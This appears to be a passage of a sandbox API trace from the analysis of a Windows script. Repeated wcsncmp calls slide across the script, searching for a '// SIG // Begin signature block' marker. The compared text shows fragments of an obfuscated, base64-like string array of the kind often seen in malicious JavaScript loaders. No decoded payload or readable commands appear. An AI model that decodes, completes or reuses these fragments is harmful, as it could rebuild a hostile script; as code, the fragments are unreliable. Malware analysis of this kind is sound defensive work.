	[0068.032] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0068.032] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0068.032] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0068.032] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0068.032] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.032] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.032] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0068.032] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0068.032] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.032] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0068.033] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.033] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0068.033] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0068.033] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.033] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0068.033] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0068.033] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0068.033] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0068.033] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0068.033] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.033] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.033] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0068.033] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0068.033] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0068.033] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0068.033] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0068.033] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.033] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.033] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0068.033] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0068.033] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0068.033] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.033] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0068.033] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0068.033] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0068.033] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0068.033] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0068.033] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0068.033] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0068.033] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.033] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0068.033] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.033] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.033] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0068.033] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0068.033] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0068.034] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.034] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0068.034] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0068.034] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.034] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0068.034] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0068.034] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0068.034] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.034] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0068.034] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0068.034] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0068.034] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0068.034] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0068.034] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0068.034] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0068.034] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0068.034] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.034] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0068.034] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.034] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.034] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0068.034] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0068.034] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.034] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0068.034] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.034] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0068.034] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0068.034] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.034] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0068.034] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0068.034] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0068.034] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.034] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0068.034] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0068.034] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0068.034] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0068.035] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0068.035] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0068.035] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0068.035] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0068.035] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.035] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0068.035] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0068.035] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0068.035] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0068.035] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0068.035] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0068.035] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0068.035] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0068.035] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0068.035] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0068.035] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.035] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0068.035] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0068.035] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.035] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0068.035] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0068.035] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0068.035] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.035] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.035] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0068.035] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0068.035] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0068.035] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0068.035] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.035] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0068.035] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.035] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0068.035] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0068.035] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0068.035] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.036] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0068.036] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0068.036] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0068.036] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0068.036] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0068.036] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0068.036] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0068.036] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0068.036] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.036] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0068.036] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0068.036] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.036] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.036] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0068.036] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0068.036] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0068.036] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0068.036] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0068.036] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0068.036] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0068.036] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.036] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0068.036] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.036] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0068.036] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0068.036] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0068.036] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0068.036] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0068.036] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0068.036] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0068.036] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0068.036] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0068.036] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0068.036] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0068.036] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0068.037] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0068.037] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.037] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0068.037] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0068.037] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0068.037] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.037] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0068.037] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0068.037] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.037] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0068.037] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0068.037] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0068.037] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0068.037] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0068.037] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0068.037] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0068.037] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0068.037] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0068.037] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0068.037] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0068.037] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0068.037] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0068.037] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0068.037] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0068.037] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
